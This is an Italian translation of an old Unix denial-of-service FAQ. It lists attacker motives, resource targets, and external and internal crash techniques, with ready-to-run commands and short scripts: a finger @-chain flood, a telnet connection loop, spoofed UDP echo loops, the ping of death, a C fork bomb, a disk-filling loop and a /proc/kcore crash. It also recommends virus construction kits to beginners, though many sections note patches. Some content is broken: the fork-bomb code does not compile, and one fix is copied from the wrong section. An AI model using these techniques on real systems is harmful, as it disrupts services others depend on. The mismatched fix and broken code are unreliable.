.F. COME PROTEGGO UN SISTEMA DAGLI ATTACCHI DENIAL OF SERVICE?
.F.1. PROTEZIONI DI BASE
.F.1.1. INTRODUZIONE
.F.1.2. PORT SCANNING
.F.1.3. CONTROLLA GLI ATTACCHI DALL'ESTERNO DESCRITTI
.F.1.4. CONTROLLA GLI ATTACCHI DALL'INTERNO DESCRITTI
.F.1.5. SISTEMI DI MASSIMA SICUREZZA
.F.1.6. CONTROLLARE LA SICUREZZA
.F.1.7. MANTENERE AGGIORNATO
.F.1.8. LEGGERE QUALCOSA DI MEGLIO
.F.2. CONTROLLARE LE PRESTAZIONI
.F.2.1. INTRODUZIONE
.F.2.2. COMANDI E SERVIZI
.F.2.3. PROGRAMMI
.F.2.4. RESOCONTI
.G. LETTURE SUGGERITE
.G.1. INFORMAZIONI PER CONOSCENZE PIù PROFONDE
.G.2. INFORMAZIONI SUGLI AGGIORNAMENTI
.G.3. INFORMAZIONI DI BASE
.H. COPYRIGHT
.I. DISCLAIMER
.0. PREFAZIONE
------------
In questo documento ho cercato di rispondere alle seguenti domande:
- Cos'è un attacco denial of service?
- Perchè qualcuno dovrebbe mandare in crash un sistema?
- Come si manda in crash un sistema?
- Come proteggo un sistema da un attacco denial of service?
C'è anche una sezione chiamata LETTURE SUGGERITE dove puoi trovare
suggerimenti su informazioni gratuite che ti potrebbero fornire una
conoscenza più dettagliata su qualcosa.
Ricorda che ho un'esperienza limitata con Macintosh, OS/2 e Windows
e la maggior parte del materiale è quindi per Unix.
Puoi trovare sempre le versioni più aggiornate al seguente indirizzo:
http://www.student.tdb.uu.se/~t95hhu/secure/denial/DENIAL.TXT
[NdT logicamente i testi sono in inglese]
Per commenti, suggerimenti e altro a:
t95hhu@student.tdb.uu.se
.A. INTRODUZIONE
~~~~~~~~~~~~~~~~
.A.1. COS'è UN ATTACCO DENIAL OF SERVICE
----------------------------------------
Denial of service quando si mettono fuori uso i servizi, per
esempio attraverso il crash dell'intero sistema. Questi tipi
di attacchi sono semplici da eseguire ed è difficile proteggere
un sistema contro di essi. Il problema di base è che Unix
presume che gli utenti sul sistema o su altri sistemi sanno
come comportarsi.
.A.2. PERCHè QUALCUNO DOVREBBE MANDARE IN CRASH UN SISTEMA?
-----------------------------------------------------------
.A.2.1. INTRODUZIONE
--------------------
Perchè qualcuno dovrebbe mandare in crash un sistema? Ci sono molti
motivi e ho presentato essi in maniera più specifica in una sezione
per ogni motivo, ma in sintesi:
.1. Introduzione
.2. Stato sottoculturale
.3. Per guadagnare l'accesso
.4. Vendetta
.5. Ragioni politiche
.6. Ragioni economiche
.7. Cattiveria
Penso che il primo e il sesto sono i più comuni oggi, ma che il quarto
e il quinto saranno i più comuni in futuro.
.A.2.2. STATO SOTTOCULTURALE
----------------------------
Dopo tutte le informazioni sul syn flood molti di tali attacchi
erano eseguiti dalla Svezia. La stragrande maggioranza di questi
attacchi non erano una parte di un attacco IP-spoof, erano "solo"
un attacco denial of service. Perchè?
Penso che gli hackers attaccano i sistemi per una pseudo-carriera
sottoculturale e penso che molti attacchi denial of service, e quì
nell'esempio il syn flood, erano eseguiti per questo motivo. Penso
anche che molti hackers cominciano la loro carriera con attacchi
denial of service.
.A.2.3. PER GUADAGNARE L'ACCESSO
--------------------------------
A volte un attacco denial of service potrebbe essere una parte di un
attacco per guadagnare l'accesso in un sistema. Al momento posso
pensare questo motivo e specificare i metodi:
.1. Qualche vecchia versione di x-lock potrebbe essere mandata
in crach con un metodo preso dalla famiglia dei denial of service
lasciando il sistema aperto. L'accesso fisico era necessario per
usare lo spazio di lavoro.
.2. Syn flood potrebbe essere una parte di un attacco IP-spoof.
.3. Alcuni programmi di sistema potrebbero avere buchi all'avvio,
che potrebbero essere usati per avere l'accesso root, per esempio
SSH (secure shell).
.4. Sotto un attacco potrebbe essere utile mandare in crash altre
macchine nella rete o negare ad alcune persone l'abilità di accedere
al sistema.
.5. Inoltre un sistema potrebbe essere avviato a volte in modo
sovvertito, specialmente nei rarp-boots. Se sappiamo quale porta
controlla il sistema (69 potrebbe essere un buon indizio) all'
avvio possiamo mandare falsi pacchetti e controllare quasi
totalmente l'avvio.
.A.2.4. VENDETTA
----------------
Un attacco denial of service potrebbe essere una parte di una vendetta
contro un utente o un amministratore.
.A.2.5. RAGIONI POLITICHE
-------------------------
Prima o poi vecchie e nuove organizzazioni capiranno il modo di
distruggere computer di sistemi e troveranno strumenti per farlo.
Per esempio immagina la Banca A che presta dei soldi alla Compagnia B
per costruire una fabbrica che minaccia l'ambiente. L'organizzazione C
L'organizzazione C quindi manda in crash il computer di sistema di A,
forse con l'aiuto di un impiegato. L'attacco potrebbe costare ad A una
grande quantità di denaro se il tempismo è giusto.
.A.2.6. RAGIONI ECONOMICHE
--------------------------
Immagina la piccola compagnia A che si muove in un mercato dominato
totalmente dalla compagnia B. I clienti di A e B fanno gli ordini dai
computers e dipendono pesantemente sull'orario che è stato effettuato (A
e B potrebbero essere compagnie di scambio). Se A e B non possono effettuare
l'ordine i clienti perdono tempo e cambiano compagnia.
Come parte di strategia di mercato A paga un esperto di computer per mandare
in crash i computers di B un numero di volte. Un anno dopo A è la compagnia
dominante.
.A.2.7. CATTIVERIA
------------------
Conosco una persona che trova una workstation dove l'utente si è dimenticato
di uscire. Questa persona si siede e scrive un programma che fa un kill -9 -1
a tempo indeterminato per almeno 30 minuti dopo il tempo di entrata e ha
piazzato una chiamata a un programma dal suo file di profilo. Questa è
cattiveria.
.A.3. ALCUNI SISTEMI OPERATIVI SONO PIù SICURI?
-----------------------------------------------
Questa è una domanda difficile a cui è difficile rispondere e non penso
che sarà data qualcosa per confrontare differenti piattaforme Unix.
Non puoi dire che un Unix è più sicuro di un altro contro i denial of
service, tutto dipende dall'amministratore.
Un confronto tra Windows 95 e NT da un lato e Unix e gli altri può
essere comunque interessante.
I sistemi Unix sono molto più complessi e hanno centinaia di programmi
integrati, servizi... Questo spesso apre molte vie per mandare in crash
il sistema dall'interno.
Nella normale rete Windows NT e 95 ci sono pochi modi per mandare in
crash il sistema. Comunque ci sono dei metodi che funzionano sempre.
Questo ci dice che non c'è una grande differenza tra Microsoft e Unix
per quanto riguarda gli attacchi dall'interno. Ma ci sono un paio di
punti:
- Unix ha molti più strumenti e programmi per scoprire un
attacco e controllare gli utenti. Per vedere cosa fa un
utente in windows è molto difficile.
- Gli amministratori medi di Unix probabilmente ha molta
più esperienza degli amministratori medi di Microsoft.
Questi due punti ci dicono che Unix è più sicuro contro gli attacchi
denial of service dall'interno.
Un confronto tra Microsoft e Unix per quanto riguarda gli attacchi
dall'esterno è molto più difficile. Comunque vorrei dire che i sistemi
medi Microsoft su Internet è più sicuro contro gli attacchi dall'esterno,
perchè normalmente hanno molti meno servizi.
.B. ALCUNI OBIETTIVI DI BASE PER UN ATTACCO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.B.1. SPAZIO SWAP
-----------------
La maggior parte dei sistemi hanno molte centinaia di Mbytes
di spazio swap per le richieste di servizio dei clients. Lo
spazio swap è usato tipicamente per una paio di processi che
hanno breve vita. Lo spazio swap non sarà quasi mai molto
usato. Un denial of service potrebbe essere basato su un
metodo che cerca di riempire lo spazio swap.
.B.2. FREQUENZA
-----------
Se la frequenza è troppo alta la rete non sarà più utilizzabile. La
maggior parte degli attacchi denial of service influenzano la
frequenza in alcuni casi.
.B.3. TAVOLE DEL KERNEL
-----------------------
E' banale traboccare le tavole del kernel che causeranno
seri problemi al sistema. I sistemi con cache vuota e piccoli
buffers buoti sono particolarmente sensibili.
L'allocazione di memoria del kernlel è anche un obietivo che è
sensibile. Il kernel ha un limite di kernelmap, se il sistema
supera questo limite non può essere più allocata memoria del
kernel e si deve riavviare la macchina. La memoria del kernel non
è usata solo per la RAM, CPU, schermi, e così via, è anche usata
per processi ordinari. Questo significa che ogni sistema può
essere mandato in crash e con un cattivo (o in alcuni casi buono)
algoritmo abbastanza veloce.
Per Solaris 2.X è misurato e riportato con il comando sar quanta
memoria del kernel sta usando il sistema, ma per SunOS 4.X non c'è
quel comando. Ciò significa che sotto SunOS 4.X non avrai un avviso.
Se usi Solaris devi scrivere sar -k 1 per avere le informazioni.
netstat -k può essere usato e mostra quanta memoria il kernel ha
allocata.
.B.4. RAM
---------
Un attacco denial of service che alloca una grande quantità di RAM
può causare una grande quantità di problemi. I servers NFS e di posta
sono attualmente estremamente sensibili perchè non hanno bisogno di
molta RAM e spesso non hanno molta RAM. Un attacco a un server NFS è
banale. Il normale client NFS farà una grande quantità di caching,
ma un clent NFS può includere comunque il programma che hai scritto
tu...
.B.5. DISCHI
------------
Un attacco classico è riempire l'hard disk, ma un attacco ai dischi
può fare molto di più. Per esempio un disco sovraccaricato può essere
manomesso in molti modi.
.B.6. CACHE
------------
Un attacco denial of service che coinvolge la cache può essere basato
su un metodo per bloccare la cache o per annullarla.
Queste cache sono trovte su Solaris 2.X:
Directory name lookup cache: Associa il nome di un file con un vnode.
Inode cache: Deposita le informazioni lette da un disco se sono ancora
necessarie.
Rnode cache: Raccoglie informazioni sul filsystem NFS.
Buffer cache: Collega i blocchi e i cilindri con il disco I/O.
.B.7. INETD
-----------
Una volta che inetd è andato in crash tutti gli altri servizi che
sono eseguiti attraverso inetd non funzioneranno più.
.C. ATTACCARE DALL'ESTERNO
~~~~~~~~~~~~~~~~~~~~~~~~~~
.C.1. AVERE PROFITTO CON IL FINGER
----------------------------------
La maggior parte delle installazioni del fingerd supportano i
reindirizzamenti agli altri gost.
Es:
$finger @system.two.com@system.one.com
il finger nell'esempio andrà attraverso system.one.com a system.two.com.
Così system.two.com sa che è system.one.com che fa il finger. Così
questo metodo può essere usato per nascondersi, ma anche per
un attacco denial of service. Guarda quì:
$ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.we.attack
Tutti quei segni @ faranno un finger a host.we.attack una, due, tre
... volte. L'effetto su host.we.attack è potente e il risultato è
grande frequenza, poca memoria libera e hard disk con poco spazio libero,
dovuto a tutti i processi figli (confronta con .D.5.).
La soluzione è installare un fingerd che non supporta i reindirizzamenti,
per esempio GNU finger. Puoi anche eliminare il servizio finger, ma penso
che è un po' troppo.
.C.2. UDP E SUNOS 4.1.3.
------------------------
SunOS 4.1.3. si avvia se un pacchetto con un'informazione non corretta
nell'header è mandata ad esso. Questa è l causa se l'ip_options indica
una dimensione sbagliata del pacchetto.
La soluzione è di installare la patch appropriata.
.C.3. BLOCCARE UP X-WINDOWS
---------------------------
Se un host accetta una sessione telnet alla porta di X-Windows
(generalmente una porta tra 6000 e 6025. Nella maggior parte dei casi
6000) potrebbe essere usata per bloccare il sistema X-Windows. Questo
può essere fatto con molte connessioni telnet alla porta o con un
programma che manda molti XOpenDisplay() alla porta.
La stessa cosa può accadere a Motif o Open Windows.
La soluzione è di negare le connessioni alla porta X-Windows.
.C.4. USO MALIZIOSO DEI SERVIZI UDP
-----------------------------------
E' semplice avere i servizi UDP (echo, time, daytime, chargen) da
far andare in loop, a causa di banali IP-spoofing. L'effetto può
essere alta frequenza che causa l'inutilità della rete. Nell'esmpio
l'header richiede che il pacchetto viene da 127.0.0.1 (loopback) e
l'obiettivo è la porta echo di system.we.attack. Siccome
system.we.attack conosce 127.0.0.1 il collegamento è stato stabilito.
Es:
from-IP=127.0.0.1
to-IP=system.we.attack
Packet type:UDP
from UDP port 7
to UDP port 7
Nota che il nome system.we.attack sembra un nome DNS, ma l'obiettivo
dovrebbe essere sempre rappresentato dall'IP.
Citazione dal commento di proberts@clark.net (Paul D. Robertson) su
comp.security.firewalls sul tema di "Introduzione ai denial of service"
" Una grande quantità di sistemi non mettono loopback sulla rete,
e semplicemente li emulano. Quindi, questo attacco avrà l'effetto
desiderato sulla macchina solo in alcuni casi. E' molto meglio
usare l'indirizzo di una differente macchina sulla stessa rete.
Ancora, i servizi standard dovrebbero essere disabilitati in
inetd.conf. Altri attacchi per stacks di IP che non supportano
ICMP, il servizio echo non è usato da molti programmi, e TCP
echo dovrebbe essere usato al posto di UDP dove è necessario ".
.C.5. ATTACCARE CON CLIENTS LYNX
--------------------------------
Un server Worold Wide Web inforcherà un processo httpd come una
risposta a una richiesta da un client, spesso Netscape o Mosaic.
Il processo dura meno din un secondo e il caricamento non sarà
mai mostrato se qualcuno usa ps. Nella maggior parte dei casi è
comunque sicuro eseguire un attacco denial of service che usa molti
clients W3, di solito clients lynx. Ma nota che il comando netstat
potrebbe essere usato per rintracciare l'attacco (grazie a Paul D.
Robertson).
Alcuni httpd (per esempio http-gw) hanno problemi normalmente con la
frequenza alta, poca memoria... E l'attacco può in quei casi far andare in
loop il server. (confronta con .C.6.)
.C.6. USO MALIZIOSO DI telnet
-----------------------------
Studia questo piccolo script:
while : ; do
telnet system.we.attack &
done
Un attacco che usa questo script potrebbe mangiare della frequenza,
ma non ha niente a che vedere con il metodo finger o altri metodi.
Il punto è che alcuni comuni firewall e httpd pensano che l'attacco
è un loop e lo annullano, fino a che l'amministratore non manda un
kill -HUP.
Questa è una semplice vulnerabilità ada alto rischio che dovrebbe
essere controllata e se presente riparata.
.C.7. USO MALIZIOSO DI telnet SU SOLARIS 2.4
---------------------------------------------
Se l'attacco fa una connessione telnet all'host Solaris 2.4 e quit
si usa:
Control-}
quit
inetd lo terrà per sempre. Un paio di centinaia...
La soluzione è installare la patch appropriata.
.C.8. COME DISABILITARE GLI ACCOUNTS
------------------------------------
Alcuni sistemi disabilitano un account dopo alcune login sbaglite, o
aspettano alcuni secondi. Tu puoi usare questa funzione per cacciare
gli utenti dal sistema.
.C.9. LINUX E TCP TIME, DAYTIME
----------------------------------
Si sa che inetd sotto Linux va in crach se troppo pacchetti SYN sono
mandati a daytime (porta 13) e/o a time (porta 37).
La soluzione è installare la patch appropriata.
.C.10. COME DISABILITARE I SERVIZI
----------------------------------
La maggior parte dei sistemi Unix disabilitano i servizi dopo un certo
numero di sessioni aperte in un certo periodo di tempo. La maggior parte
dei sistemi hanno uno standard ragionevole (diciamo 800-1000), ma non
alcuni sistemi SunOS che hanno lo standard a 48...
La soluzione è settare il numero in qualcosa di ragionevole.
.C.11. PARAGON OS BETA R1.4
---------------------------
Se qualcuno reindirizza un pacchett ICMP (Internet Control Message Protocol)
a un paragon OS beta R1.4 la macchina si bloccherà e deve essere riavviata.
Un reindirizzo di ICMP dice al sistema di sostituire le tavole di routing.
I router usano questo per dire all'host che sta mandando il pacchetto a un
router sbagliato.
La soluzione è installare la patch appropriata.
.C.12. FTP DI NOVELLS NETWARE
-----------------------------
Il server FTP di Novells Netware è conosciuto poichè la memoria si riduce
se ci sono molte sessioni ftp connesse.
.C.13. ATTACCHI CON REINDIRIZZAMENTO DI ICMP
--------------------------------------------
Le Gateways usano il reindirizzamento di ICMP per dire al sistema di cambiare
le tavole di routing, cioè sta dicendo al sistema di prendere una via migliore.
Per manomettere il reindirizzo degli ICMP dobbiamo conoscere una connessione
esistente (ne possiamo creare una per noi stessi, ma non c'è molto utilizzo
per quella). Se abbiamo trovato una connessione noi possiamo mandare un flusso
che gli fa perdere la connessione o potremmo mandare falsi messaggio all'host
se la connesione che abbiamo trovato non cripta i pacchetti.
Es: (messaggio falso da mandare)
DESTINATION UNREACHABLE
TIME TO LIVE EXCEEDED
PARAMETER PROBLEM
PACKET TOO BIG
L'effetto di tale messaggio è il blocco della connessione.
La soluzione potrebbe essere disabilitare il reindirizzamento di ICMP, non
usato propriamente dal servizio.
.C.14. TEMPESTE DI BROADCAST
----------------------------
Questo è un metodo molto popolare nelle reti dove tutti gli host agiscono
come gateways.
Ci sono molte versioni dell'attacco, ma il metodo di base è mandare molti
pacchetti a tutti gli host nella rete con una destinazione che non esiste.
Ogni host cercherà di inoltrare ogni pacchetto così i pacchetti rimbalzeranno
per molto tempo. E se si aggiungono i nuovi pacchetti alla rete, la rete
sarà nei guai.
I servizi che possono essere manomessi e utilizzati in questo tipo di attacco
sono per esempio il ping, il finger e il sendmail. Ma possono essere manomessi
la maggior parte dei servizi in un modo o nell'altro.
.C.15. EMAIL BOMBING E SPAMMING
-------------------------------
In un attacco email bombing l'attaccante manderà ripetutamente identici messaggi
email a un indirizzo. L'effetto sull'obiettivo è alta frequenza, un hard disk con poco
spazio e così via... L'email spamming è quando si mandano delle mail a tutti (o
quasi) gli utenti del sistema. Il motivo per il quale si usa lo spamming al posto
del bombing è che alcuni utenti cercano di mandare una risposta e se l'indirizzo
è falso, la mail tornerà indietro. In quel caso una mail si è trasformata in tre
mail. L'effetto sulla frequenza è ovvio.
Non c'è modo di prevenire un email bombing o spamming. Comunque dai un'occhiata
al documento della CERT "Email bomginb and spamming".
.C.16. TIME E KERBEROS
----------------------
Se le macchine sorgente e obiettivo sono allineate da vicino il biglietto verrà
respinto, ciò significa che se il protocollo che setta il tempo è protetto sarà
possibile settare un server kerberos.
.C.17. IL BUG DOT DOT
---------------------
Il sistema di condivisione file di Windows NT è vulnerabile al famoso bug dot dot
sotto Windows 95. Ciò significa che chiunque può mandare in crash il sistema. Se
qualcuno manda un "DIR ..\" alla workstation un messaggio di STOP apparirà sullo
schermo del computer Windows NT. Nota che è applicabile alle versioni 3.50 e 3.51
per le versioni sia workstation che server.
La soluzione è installare la patch appropriata.
.C.18. KERNEL PANIC DEL SUNOS
-----------------------------
Alcuni sistemi SunOS (che eseguono TIS?) avranno un kernel panic se è mandato un
getsockopt(). La connessione così sarà interrotta.
La soluzione potrebbe essere installare la Sun Patch 100804.
.C.19. APPLETS OSTILI
---------------------
Una applet ostile è quando un applet cerca di usare il tuo sistema in un modo
inappropriato. I problemi nel linguaggio java potrebbero essere ordinati in due
grandi gruppi:
1) Problemi dovuti ai bugs.
2) Problemi dovuti a caratteristiche nel linguaggio.
Nel primo gruppo abbiamo per esempio il bug java bytecode verifier, che permette a
un'applet di eseguire tutti i comandi che un utente potrebbe eseguire. Ciò significa
che tutti i metodi di attacco descritti in .D.X. possono essere seguiti attraverso
un'applet. Il bug java bytecode verifier fu scoperto a fine Marzo 1996 e non ci sono
patch disponibili (correggetemi se sbaglio!).
[NdT siccome il documento è un po' vecchio, probabilmente ora esiste una patch per
questo bug]
Nota che due altri bugs possono essere inseriti nel primo gruppo ma sono entrambi
riparati in Netscape 2.01 e JDK 1.0.1.
Il gruppo due è più interessante e una grande problema è il fatto che java può
connettersi alle porte. Ciò significa che tutti i metodi descritti in .C.X. possono
essere eseguiti da un'applet. Maggiori informazioni ed esempio possono essere
trovati all'indirizzo:
http://www.math.gatech.edu/~mladue/HostileArticle.html
Se hai bisogno di un maggior livello di sicurezza usa dei firewall che proteggono
da java. Come utente, dovresti aver disabilitato java.
.C.20. VIRUS
------------
I virus per il computer sono scritti allo scopo di distruggere e propagare i sistemi.
I virus sono ancora il metodo d'attacco denial of service più diffuso.
Non è vero che scrivere virus è difficile. Se conosci il linguaggio assembly e hai
alcuni codici sorgente di virus è facile. Si possono scaricare degli strumenti per la
costruzione di virus, per esempio:
* Genvir.
* VCS (Virus Construction Set).
* VCL (Virus Construction Laboratory).
* PS-MPC (Phalcon/Skism - Mass Produced Code Generator).
* IVP (Instant Virus Production Kit).
* G2 (G Squared).
PS-MPC e VCL sono i migliori e possono aiutare il programmatore novello a capire
come scrivere un virus.
Si può trovare anche uno strumento chiamato MtE. MtE trasformerà un virus in un
virus "mutevole". Il motore mutevole di MtE è noto e può essere rintracciato da
un antivirus.
.C.21. ABUSO DI FTP ANONIMO
---------------------------
Se un archivio FTP anonimo ha un'area scrivibile può essere manomesso per un attacco
denial of service simile a quello .D.3. Noi così possiamo riempire l'hard disk.
Un host inoltre può essere temporanemante inaccessibile a causa di eccessive
richieste FTP.
Pe maggiori informazioni su come proteggere un FTP anonimo, il documento della CERT
"Anonymous FTP Abuses" potrebbe essere un buon punto d'inizio.
.C.22. SYN FLOOD
----------------
Sia 2600 e Phrack hanno pubblicato informazioni sull'attacco syn flood. 2600 ha anche
pubblicato un exploit per l'attacco.
Come sappiamo il pacchetto syn è usato in un handshake di 3 fasi. L'attacco syn flood
è basato su un incompleto handshake. L'host che attacca manderà un flusso di pacchetti
syn ma non risponerà con un pacchetto ACK. Lo stack TCP/IP aspetterà un certo periodo
di tempo prima di interrompere la connessione, così un attacco syn flood manterrà quindi
la connessione tcp_received in coda della macchina colpita.
L'attacco syn flood è molto buono ed è facile trovare maggiori informazioni su di esso,
per esempio:
[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html
Articolo di Christopher Klaus che include una "soluzione".
[.2.] http://jya.com/floodd.txt
2600, Estate, 1996, pp. 6-11. FLOOD WARNING di Jason Fairlane
[.3.] http://www.fc.net/phrack/files/p48/p48-14.html
IP-spoofing Demystified by daemon9 / route / infinity
per Phrack Magazine
.C.23. PING FLOOD
-----------------
Non testato quanto può essere grande un attacco ping flood, ma potrebbe essere abbastanza
grande.
Sotto Unix possiamo trovare qualcosa come: ping -s host
per mandaer pacchetti di 64 bytes.
Se hai Windows 95, clicca sul pulsante Avvio, poi su Esegui e poi scrivi:
PING -T -L 256 xxx.xxx.xxx.xx. Eseguilo circa 15 volte contemporaneamente.
.C.24. MANDARE IN CRASH I SISTEMI CON IL PING DI WINDOWS 95
-----------------------------------------------------------
Se qualcuno può pingare la tua macchina da una macchina Windows 95 eglio può resettare o
bloccare la tua macchina. L'attaccante scrive semplicemente:
ping -l 65510 address.to.the.machine
E la macchina si bloccherà o si riavvierà.
Funziona con il kernel 2.0.7 fino alla versione 2.0.20 e 2.1.1 per Linux (crash).
AIX4, OSF, HPUX 10.1,DUnix 4.0 (crash).
OSF/1, 3.2C, Solaris 2.4 x86 (riavvio).
.C.25. USO MALIZIOSO DEL MESSAGGIO DI RISPOSTA DELLE SUBNET MASK
----------------------------------------------------------------
Il messaggio di riposta delle subnet mask è usato al riavvio, ma alcuni hosts
accettano il messaggio ogni volta senza controllare. In questo modo tutte le
comunicazioni a o dall'host sono interrotte.
L'host non dovrebbe accettare il messaggio sempre ma solo durante il riavvio.
.C.26. FLEXlm
-------------
Ogni host che esegue FLEXlm ha la FLEXlm license manager daemon su ogni rete
che per spegnere usano il comando FLEXlm lmdown.
# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.
Shutting down FLEXlm on nodes: xxx
Are you sure? [y/n]: y
Shut down node xxx
#
.C.27. PARTIRE CON FTP BANALI
-----------------------------
Per partire con workstation senza disco si usa un ftp banale con rarp o bootp.
Se un attaccante non è protetto può usare tftp per avviare l'host.
.D. ATTACCARE DALL'INTERNO
~~~~~~~~~~~~~~~~~~~~~~~~~~
.D.1. KERNEL PANIC SOTTO SOLARIS 2.3
------------------------------------
Solaris 2.3 avrà un kernel panic se è eseguito questo:
$ndd /dev/udp udp_status
La soluzione è installare la patch appropriata.
.D.2. MANDARE IN CRASH IL SERVER X
----------------------------------
Se stickybit non è settato in /tmp, il file /tmp/.x11-unix/x0 può essere rimosso
e il server X andrà in crash.
Es:
$ rm /tmp/.x11-unix/x0
.D.3. RIEMPIRE L'HARD DISK
--------------------------
Se lo spazio sul tuo hard disk non è limitato o se puoi usare /tmp è possibile
riempire il file system.
Es:
while : ;
mkdir .xxx
cd .xxx
done
.D.4. USO MALIZIOSO DI eval
---------------------------
Alcuni vecchi sistemi andranno in crash se è eseguito eval '\!\!' in una C-shell.
Es:
% eval '\!\!'
.D.5. USO MALIZIOSO DI fork()
-----------------------------
Se qualcuno esegue questo programma C++ il risultato sarà il crash della maggior
parte dei sistemi.
Es:
#include <sys/types.h>
#include <unistd.h>
#include <iostream.h>
main()
{
int x;
while(x=0;x<1000000;x++)
{
system("uptime");
fork();
}
}
Puoi usare tutti i comandi che vuoi, ma uptime è bello perchè mostra il carico
di lavoro.
Per avere un attacco più grande e potente dovresti comunque rimpiazzare uptime
con sync. Questo è molto cattivo.
Se fai sul serio puoi instaurare un processo "figlio" per ogn processo "figlio" e
avremo un incremento del carico di lavoro.
Non ci sono buoni modi di fermare questo attacco e attacchi simili. Una soluzione
potrebbe essere piazzare un limite di tempo sull'esecuzione e dimensione dei processi.
.D.6. CREARE FILES CHE SONO DIFFICILI DA RIMUOVERE
--------------------------------------------------
Tutti i files possono essere rimossi, ma quì c'è qualche idea:
Es.1.
$ cat > -xxx
^C
$ ls
-xxx
$ rm -xxx
rm: illegal option -- x
rm: illegal option -- x
rm: illegal option -- x
usage: rm [-fiRr] file ...
$
Es.2.
$ touch xxx!
$ rm xxx!
rm: remove xxx! (yes/no)? y
$ touch xxxxxxxxx!
$ rm xxxxxxxxx!
bash: !": event not found
$
Altri metodi conosciuti sono files con caratteri dispari o spazi nel nome.
Questi metodi potrebbero essere usati in combinazione con ".D.3. RIEMPIRE L'
HARD DISK". Se vuoi rimuovere questi files devi usare degli script o un'interfaccia
grafica come il File Manager di OpenWindow. Puoi anche tentare di usare: rm ./<file>.
Dovrebbe funzionare per il primo esempio se hai una shell.
.D.7. DIRECTORY NAME LOOKUPCACHE
--------------------------------
Directory name lookupcache (DNLC) è usato quando un file è aperto. DNLC associa
il nome del file a un vnode. Ma DNLC può solo operare su files i quali nomi sono
composti da un certo numero di caratteri (per SunOS 4.x fino a 14 caratteri, per
Solaris 2.x fino a 30 caratteri). Questo significa che è facile eseguire un discreto
attacco denial of service.
Crea diciamo 20 directory (per iniziare) e metti 10 files vuoti in ogni directory.
Fai sì che ogni nome di file abbia oltre i 30 caratteri ed esegui uno script che
fa molti ls-al nelle directory.
Se l'impatto non è grande abbastanza, dovresti creare più files o eseguire più
processi.
.D.8. ATTACCO CSH
-----------------
Esegui questo in /bin/csh (dopo le modifiche appropriate) e il livello di caricamento
salirà di molto (100% del tempo della cpu) in poco tempo.
|I /bin/csh
nodename : **************b
.D.9. CREARE FILES IN /tmp
--------------------------
Molti programmi creano files in /tmp, ma è difficile trattare del problema se
il file esiste già. In alcuni casi questo potrebbe essere usato per un attacco
denial of service.
.D.10. USARE RESOLV_HOST_CONF
-----------------------------
Alcuni sistemi hanno un piccolo buco di sicurezza nel modo in cui usano la variabile
RESOLV_HOST_CONF. Noi possiamo mettere delle cose in esso e attraverso l'accesso
ping avremo dei dati come /etc/shadow o potremo mandare in crash il sistema. La maggior
parte dei sistemi andranno in crash se c'è /proc/kcore nella variabile e accedendo
tramite ping.
Es:
$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf
.D.11. SUN 4.X E LAVORI NASCOSTI
--------------------------------
Grazie a Mr David Honig <honig@amada.net> per il documento seguente:
" Metti la stringa "a&" in un file chiamato "a" e esegui un "chomod +x a". Eseguendo
"a" disattiverai lentamente una macchina SunOS 4.x, disabilitando anche il login root
e riempiendo le tavole del kernel."
" La cosa bella è la dimensione dello script, e quante poche battute di tasti ci vogliono
per disattivare una macchina Sun come utente".
.D.12. MANDARE IN CRASH DG/UX CON ULIMIT
----------------------------------------
ulimit è usato per settare un limite sulle risorse di sistema disponibili alla shell. Se
ulimit 0 è chiamato prima di /etc/passwd, sotto DG/UX, il file passwd sarà settato a 0.
.D.13. NETTUNE E HP-UX
----------------------
/usr/contrib/bin/nettune è SETUID root su HP-UX, cioè ogni utente può resettare tutti gli
ICMP, IP e i parametri TCP del kernel, per esempio i seguenti parametri:
- arp_killcomplete
- arp_killincomplete
- arp_unicast
- arp_rebroadcast
- icmp_mask_agent
- ip_defaultttl
- ip_forwarding
- ip_intrqmax
- pmtu_defaulttime
- tcp_localsubnets
- tcp_receive
- tcp_send
- tcp_defaultttl
- tcp_keepstart
- tcp_keepfreq
- tcp_keepstop
- tcp_maxretrans
- tcp_urgent_data_ptr
- udp_cksum
- udp_defaultttl
- udp_newbcastenable
- udp_pmtu
- tcp_pmtu
- tcp_random_seq
La soluzione potrebbe essere settare il permesso appropriato a /sbin/mount_union:
#chmod u-s /sbin/mount_union
.D.14. SOLARIS 2.X E NFS
------------------------
Se un processo sta scrivendo a NFS e l'utente supera lo spazio sul disco il processo
andrà in un loop infinito.
.D.15. STABILITà DEL SISTEMA COMPROMESSA DA MOUNT_UNION
-------------------------------------------------------
Eseguendo una sequenza di comandi mount_union ogni utente può causare un "ricaricamento"
del sistema su tutti i FreeBSD 2.x prima del 18/05/1996.
$ mkdir a
$ mkdir b
$ mount_union ~/a ~/b
$ mount_union -b ~/a ~/b
La soluzione potrebbe essere settare il permesso appropriato in /sbin/mount_union:
#chmod u-s /sbin/mount_union
.D.16. trap_mon CAUSA KERNEL PANIC SOTTO SUNOS 4.1.X
----------------------------------------------------
Eseguendo l'istruzione trap_mon da utente si può causare un kernel panic o un
"window underflow watchdog reset" sotto SunOS 4.1.x, architettura sun4c.
.E. DUMPING CORE
~~~~~~~~~~~~~~~~
.E.1. BREVE COMMENTO
-------------------
I core dumps non appartengono in realtà a questo documento ma li ho messi comunque.
.E.2. USO MALIZIOSO DI NETSCAPE
-------------------------------
Sotto Netscape 1.1N questo collegamento causerà un segmentation fault e un core dump.
<a name="http://xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx...>
.E.3. CORE DUMPED SOTTO WUFTPD
------------------------------
Un core dumped potrebbe essere causato sotto wuftp con due metodi differenti:
(1) pasv è dato (utente non collegato (ftp-n)). Quasi tutte le versioni
ftpd di BSD.
